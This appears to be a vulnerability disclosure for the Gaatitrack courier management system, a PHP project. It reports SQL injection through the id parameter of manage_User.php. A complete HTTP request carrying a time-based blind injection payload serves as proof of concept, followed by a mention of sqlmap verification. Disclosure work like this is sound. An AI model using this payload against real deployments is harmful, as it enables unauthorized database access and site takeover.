Skip to content

Latest commit

 

History

History
37 lines (24 loc) · 1.67 KB

File metadata and controls

37 lines (24 loc) · 1.67 KB

Gaatitrack courier management system has SQL injection vulnerabilities

Source code download:https://www.sourcecodester.com/php/16848/best-courier-management-system-project-php.html

Version:2023/10/27

Vulnerability Description: The system has an SQL injection vulnerability, which allows attackers to obtain database information and gain website control permissions by inserting malicious SQL statements.

Cause of vulnerability occurrence: Vulnerability occurs in gaatitrack/manage_User.php On line 5, the id parameter is concatenated from user controlled input into the SQL query statement, resulting in SQL injection

Vulnerability verification: After setting up the system, access local port 80

send payload:

GET http://192.168.211.1/gaatitrack/manage_user.php?id=%28select%2Afrom%28select%2Bsleep%283%29union%2F%2A%2A%2Fselect%2B1%29a%29 HTTP/1.1
Host: 192.168.211.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The response time is 3 seconds, as expected:

Verify using sqlmap: